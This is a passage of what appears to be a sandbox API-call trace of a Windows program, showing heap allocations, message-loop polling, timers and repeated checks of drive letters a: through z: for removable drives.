(in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0216.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.994] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.994] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.994] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.994] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.995] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.995] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.995] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.995] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.995] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.996] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.996] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.996] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.996] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.996] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.997] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.997] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.997] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.998] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.998] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.998] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.998] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.998] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.999] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.999] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.999] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.999] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.000] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.000] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.000] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.000] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.000] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.002] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.002] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.002] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.002] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.002] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.002] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.002] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.002] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.002] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0217.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0217.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0217.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0217.003] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0217.003] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.004] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.004] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.004] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.004] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0217.004] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.004] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.004] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.005] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.005] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.005] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0217.006] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.006] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.006] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.006] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.006] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.006] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.007] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.007] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.009] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.009] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.009] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.009] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.010] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.010] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.010] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.010] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.010] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.011] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.011] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.011] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.011] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.011] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.012] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.012] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.012] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.012] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.012] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.013] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.013] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.013] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.013] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.013] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.013] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.013] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.013] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.013] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0217.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.014] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0217.014] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0217.014] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.014] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.014] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.014] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.015] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.015] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0217.015] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.015] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0217.015] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.015] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.015] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.015] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.015] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.015] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.016] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.016] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.016] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.016] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.016] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.017] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.017] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.017] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.017] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.017] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.018] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.018] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.018] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.019] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.019] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.019] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.019] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.020] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.020] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.020] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.020] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.020] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.021] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.021] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.021] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.021] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.021] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.021] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.021] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0217.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.022] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.022] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.022] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.022] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.022] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.022] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0217.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 